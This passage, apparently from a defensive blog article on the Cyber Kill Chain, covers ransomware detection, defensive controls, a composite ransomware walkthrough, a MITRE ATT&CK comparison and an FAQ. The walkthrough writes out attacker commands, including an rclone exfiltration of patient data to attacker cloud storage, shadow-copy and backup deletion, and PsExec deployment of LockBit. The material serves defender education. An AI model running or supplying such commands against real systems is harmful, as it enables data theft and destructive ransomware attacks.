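    """The same precursor on several hosts at once means the encryptor is being pushed (PsExec, GPO)."""
    return len(impacted_hosts(alerts)) >= host_threshold


if __name__ == "__main__":
    found = detect_precursors(SAMPLE_PROCESS_EVENTS)
    for alert in found:
        print(f"{alert['host']:10} {alert['rule']:48} <- {alert['parent']}")
    print("fleet-wide deployment suspected:", fleet_wide(found))
```

Wire the single-host alert to an automated isolation action rather than a ticket: by the time an analyst reads it, the encryptor that follows these commands has usually already started.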
Defensive posture:
- Immutable, offline backups — 3-2-1 rule (3 copies, 2 different media types, 1 offsite). Test restores on a defined schedule; an untested backup is not a backup.
- UEBA (User and Entity Behavior Analytics) to surface anomalous access patterns (Exabeam, Splunk UBA)
- DLP (Data Loss Prevention) to alert on large-volume data staging or transfers
- Privileged Access Workstations (PAW) + tiered administration model to contain lateral movement
- Rehearsed Incident Response plan — tabletop exercises quarterly minimum
Real-World Cyber Kill Chain Example: Ransomware Attack Walkthrough
This is a composite walkthrough based on publicly documented ransomware TTPs (CISA advisories, Mandiant M-Trends, CrowdStrike reporting). No single incident — combined to illustrate how all 7 phases connect in practice.
Target: Regional healthcare provider, ~3,000 employees
Phase 1 — Reconnaissance (Day 1–3)
The threat actor identifies the organization via a healthcare industry targeting list. Using theHarvester and LinkedIn, they enumerate 400+ employee emails and identify the IT Director by name. A Shodan search returns a Citrix NetScaler appliance running a version vulnerable to CVE-2023-4966 (Citrix Bleed).
Phase 2 — Weaponization (Day 4–5)
The group is a RaaS affiliate using LockBit 3.0. The encryptor is pre-built. The affiliate configures a Cobalt Strike listener with an HTTPS malleable profile mimicking Microsoft Azure CDN traffic. C2 domain registered 6 days ago, hosted on a bulletproof hosting provider.
Phase 3 — Delivery (Day 6)
Rather than phishing, the attacker exploits the vulnerable Citrix appliance directly — no user interaction required. CVE-2023-4966 allows unauthenticated session token extraction. The attacker hijacks an active VPN session belonging to an IT administrator.
Phase 4 — Exploitation (Day 6, same day)
With a valid admin VPN session, the attacker authenticates to the Citrix gateway and accesses the internal network as a legitimate privileged user. No vulnerability triggered on internal systems — they walked in through the front door.
Phase 5 — Installation (Day 6–7)
The attacker deploys a Cobalt Strike beacon on a domain-joined Windows server. Persistence is established via a new Windows service (WindowsTelemetryHelper) and a registry Run key on a backup server. Timestomping applied to beacon DLL — file appears created 8 months prior.
Phase 6 — Command & Control (Day 6–17)
The beacon checks in every 5 minutes with 15% jitter over HTTPS to the bulletproof-hosted C2 domain, using the malleable profile that mimics Azure CDN traffic. Eleven days of undetected activity: the attacker conducts internal reconnaissance, dumps LSASS for credential harvesting, moves laterally to the domain controller, and locates backup infrastructure.
```powershell
# Attacker activity observed during C2 phase
net group "Domain Admins" /domain                                # enumerate privileged groups
Get-ADComputer -Filter * | Select Name                           # list all domain-joined systems
wmic /node:[backup-server] process call create "cmd.exe /c whoami"
```
Phase 7 — Actions on Objectives (Day 17–18)
With Domain Admin credentials and access to all systems:
```cmd
# Exfiltration: 250 GB staged and sent via rclone to attacker cloud storage
rclone copy \\fileserver\patientdata\ remote:exfil-bucket --transfers 32
# Backup destruction before encryption
vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet
# LockBit 3.0 deployed via PsExec to 1,200 endpoints simultaneously
PsExec.exe \\[target] -c -f -d LockBit3.exe --silent
```
Ransom demand: $4.2 million. Recovery time without tested backups: estimated 3–5 weeks of partial operations.
Where the chain could have been broken:
- Phase 1: Vulnerable Citrix version visible on Shodan — patch or restrict access
- Phase 3/4: CVE-2023-4966 was in CISA KEV 11 days before this attack
- Phase 6: Cobalt Strike beacon beaconing at regular intervals — NTA or EDR telemetry would have caught this
- Phase 7: Shadow copy deletion is a high-confidence ransomware indicator — alert on vssadmin delete shadows immediately
Cyber Kill Chain vs MITRE ATT&CK
One of the most common questions in threat modeling discussions is where these two frameworks fit relative to each other. They are complementary, not competing.
| Dimension | Cyber Kill Chain | MITRE ATT&CK |
|---|---|---|
| Created by | Lockheed Martin (2011) | MITRE Corporation (2013) |
| Structure | 7 sequential phases | 14 tactics, 200+ techniques and 400+ sub-techniques (Enterprise matrix) |
| Granularity | Strategic / phase-level | Tactical / technique-level |
| Best used for | Measuring defense coverage across an attack lifecycle | Detection engineering, threat hunting, red team planning |
| Attacker model | Single linear intrusion | Non-linear, technique-level behavior |
| Insider threat coverage | Poor (skips Phases 1–4) | Good (covers all behaviors post-access) |
| Tooling | N/A | ATT&CK Navigator, threat intel platforms |
How to use both together:
Use the Kill Chain to answer the strategic question: "At which phases do we have coverage, and where are the gaps?"
Use MITRE ATT&CK to answer the tactical question: "For a given phase, which specific techniques should we detect, and how?"
For example: Kill Chain Phase 5 (Installation) maps to ATT&CK techniques including T1547.001 (Registry Run Keys), T1543.003 (Create/Modify System Process), T1070.006 (Timestomping), and T1505.003 (Web Shell). ATT&CK gives you the detection logic; the Kill Chain gives you the strategic context.
→ See also: MITRE ATT&CK Explained: Tactics, Techniques, and How to Use the Navigator
Breaking the Chain: Defense Coverage by Phase
| Phase | Detection Opportunity | Primary Controls |
|---|---|---|
| Reconnaissance | Very Low | OSINT self-assessment, attack surface reduction |
| Weaponization | None | Threat intel feeds, sandbox detonation |
| Delivery | High | Email gateway + sandbox, URL filtering, macro policy |
| Exploitation | Medium | EDR behavioral detection, patch management (CISA KEV) |
| Installation | Medium | FIM, Sysmon, autoruns baselining, app whitelisting |
| Command & Control | High | NTA, DNS monitoring, JA3 fingerprinting, egress filtering |
| Actions on Objectives | Medium | Offline backups (tested), UEBA, DLP, IR runbooks |
The goal is defense in depth: no single phase should rely on a single control. Assume breach at every layer and ensure the next layer catches what the previous missed.
Common Mistakes When Applying the Cyber Kill Chain
Mistake 1: Treating it as a linear checklist Real intrusions aren't always perfectly sequential. Attackers may loop back to reconnaissance post-exploitation (internal recon ≠ external recon), or skip phases when they have valid credentials from the start (e.g., phished MFA codes, purchased access from an Initial Access Broker).
Mistake 2: Over-indexing on late-stage detection Most security programs invest heavily in Exploitation and beyond — that's where EDR and SIEM shine. Delivery-phase controls (email sandboxing, phishing simulation, macro policy) often have higher ROI and stop attacks before any code runs.
Mistake 3: Ignoring Weaponization-phase intelligence ISAC (Information Sharing and Analysis Center) memberships and TI feeds often surface malware campaigns and C2 infrastructure before they hit your perimeter. Early warning at Phase 2 eliminates the attack before it reaches your environment.
Mistake 4: No tested backup and recovery Backup infrastructure that's documented but never restored from is not a recovery capability. Shadow Copy deletion + no tested offline backup = paying the ransom or rebuilding from scratch.
Mistake 5: Treating LotL as a blind spot Living-off-the-land techniques (PowerShell, WMI, certutil, mshta) blur phase boundaries and evade signature detection. Behavioral detection rules and PowerShell Script Block Logging (Event ID 4104) are essential to counter this.
Conclusion
Every major breach follows a predictable sequence. The Cyber Kill Chain gives you a framework to map your defenses to that sequence and find the gaps before an attacker exploits them.
The 7 kill chain phases aren't just academic categories — they're decision points. At each one, you either have a control in place that raises the cost for the attacker, or you don't. If your detection coverage only starts at Exploitation, you've already handed the attacker four uncontested phases.
Map your controls to the Kill Chain. Find the gaps. Prioritize fixes by attacker advantage — not by implementation effort.
→ Related: MITRE ATT&CK Explained: Tactics vs Techniques — the granular companion to the Kill Chain.
→ Related: What is a SOC? Roles, Tools, and Detection Workflows — how a SOC operationalizes Kill Chain detection at scale.
FAQ — Cyber Kill Chain
What is the Cyber Kill Chain?
The Cyber Kill Chain is a cybersecurity framework that models the 7 sequential phases an attacker must complete to successfully execute a cyberattack: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command & Control, and Actions on Objectives. Originally developed by Lockheed Martin in 2011, it is used by security teams to map defensive controls to attacker behavior and identify coverage gaps.
Who created the Cyber Kill Chain?
The Cyber Kill Chain® was created by Lockheed Martin and published in their 2011 paper "Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains" by Eric Hutchins, Michael Cloppert, and Rohan Amin. It adapted the military concept of a "kill chain" — the sequence of steps required to engage a target — to the cyber intrusion domain.
Is the Cyber Kill Chain still relevant in 2026?
Yes, with caveats. The Kill Chain remains a valuable strategic framework for security program design and defense coverage measurement. Its limitations are well-understood: it models a single linear intrusion and doesn't account well for insider threats, living-off-the-land techniques, or non-linear attack sequences. In practice, most security teams use it alongside MITRE ATT&CK — the Kill Chain for strategic phase coverage, ATT&CK for technique-level detection engineering.
What is the difference between the Cyber Kill Chain and MITRE ATT&CK?
The Kill Chain provides a 7-phase strategic model of a complete attack lifecycle. MITRE ATT&CK provides granular coverage of hundreds of individual adversary techniques and sub-techniques across 14 tactics. They operate at different levels of abstraction and are best used together: the Kill Chain to identify which phases lack defensive coverage, ATT&CK to specify what behaviors to detect within those phases.
Why is the Cyber Kill Chain important for defenders?
Because it shifts the defensive mindset from reactive to proactive. Rather than waiting for an alert at Exploitation or later, the Kill Chain makes visible that there are detection opportunities as early as Delivery and Reconnaissance. It also frames defense as a cost-imposition problem: every control you add at every phase increases attacker effort and probability of detection — even if no single control is perfect. For SOC analysts, threat hunters, and IR teams, thinking in kill chain phases accelerates triage and focuses containment.
How many phases are in the Cyber Kill Chain?
The Cyber Kill Chain consists of 7 phases: (1) Reconnaissance, (2) Weaponization, (3) Delivery, (4) Exploitation, (5) Installation, (6) Command & Control, and (7) Actions on Objectives.
Tags: #cybersecurity #threatintel #blueteam #redteam #killchain #incidentresponse #apt #ransomware